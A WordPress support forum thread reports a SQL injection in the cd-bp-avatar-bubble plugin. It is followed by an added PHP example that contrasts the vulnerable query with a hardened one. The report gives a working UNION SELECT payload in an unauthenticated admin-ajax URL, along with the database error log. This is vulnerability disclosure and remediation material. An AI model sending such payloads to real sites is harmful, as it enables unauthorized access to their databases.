• Resolved demon_ru

    (@demon_ru)


    I think that this plugin is vulnerable to SQL injection.
    URL like: /wp-admin/admin-ajax.php?action=cd_ab_the_avatardata&ID=if%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&type=user

    error log:
    FastCGI sent in stderr: ",NULL,NULL,NULL#)' at line 1 в ответ на запрос SELECT id, user_id, field_id, value, last_updated FROM wp_bp_xprofile_data WHERE field_id = 15 AND user_id IN (if) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#), выполненный do_action('wp_ajax_nopriv_cd_ab_the_avatardata'), call_user_func_array, cd_ab_the_avatardata, cd_ab_get_the_userdata, xprofile_get_field_data, BP_XProfile_ProfileData::get_value_byid"

    The plugin was disabled.

    https://www.ads-software.com/plugins/cd-bp-avatar-bubble/
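The error log above shows the request's ID value landing verbatim inside the `user_id IN (...)` clause of an unauthenticated (`wp_ajax_nopriv_`) handler. The following is an added illustration, not the plugin's own code: the pattern the log implies, next to a hardened handler that coerces every ID to an integer and binds it through `$wpdb->prepare()`. The function bodies, the nonce name and the accepted `type` values are assumptions; only the hook and function names, the table, and `field_id = 15` come from the report.

```php
<?php
// Added example (not from the cd-bp-avatar-bubble plugin). Names of the
// handler and helper mirror the report; the bodies are assumptions.

// Pattern the log implies: the raw request value reaches the IN() list,
// so "if) UNION ALL SELECT ...#" is executed as SQL.
function cd_ab_get_the_userdata_vulnerable( $id, $field_id ) {
    global $wpdb;
    $sql = "SELECT id, user_id, field_id, value, last_updated FROM {$wpdb->prefix}bp_xprofile_data "
         . "WHERE field_id = " . (int) $field_id . " AND user_id IN ($id)";
    return $wpdb->get_results( $sql );
}

// Hardened: every ID becomes a positive integer and is bound with a %d
// placeholder, so no request text is ever concatenated into the query.
function cd_ab_get_the_userdata_hardened( $id, $field_id ) {
    global $wpdb;
    $ids = array_filter( array_map( 'absint', explode( ',', (string) $id ) ) );
    if ( empty( $ids ) ) {
        return array();
    }
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql = $wpdb->prepare(
        "SELECT id, user_id, field_id, value, last_updated FROM {$wpdb->prefix}bp_xprofile_data "
        . "WHERE field_id = %d AND user_id IN ($placeholders)",
        array_merge( array( absint( $field_id ) ), array_values( $ids ) )
    );
    return $wpdb->get_results( $sql );
}

// AJAX entry point: verify a nonce (name assumed), allow only known types,
// and pass sanitized input to the hardened helper.
function cd_ab_the_avatardata_hardened() {
    check_ajax_referer( 'cd_ab_avatar', 'nonce' );
    $type = isset( $_GET['type'] ) ? sanitize_key( wp_unslash( $_GET['type'] ) ) : '';
    if ( 'user' !== $type ) { // extend the allow-list only with values the plugin really supports
        wp_send_json_error( 'invalid type', 400 );
    }
    $id   = isset( $_GET['ID'] ) ? sanitize_text_field( wp_unslash( $_GET['ID'] ) ) : '';
    $rows = cd_ab_get_the_userdata_hardened( $id, 15 ); // field_id 15 as seen in the log
    wp_send_json_success( $rows );
}
add_action( 'wp_ajax_cd_ab_the_avatardata', 'cd_ab_the_avatardata_hardened' );
add_action( 'wp_ajax_nopriv_cd_ab_the_avatardata', 'cd_ab_the_avatardata_hardened' );
```

With the hardened helper, the reported payload is reduced by `absint()` to no usable IDs and the handler returns an empty result instead of reaching MySQL.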

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘SQL Injection’ is closed to new replies.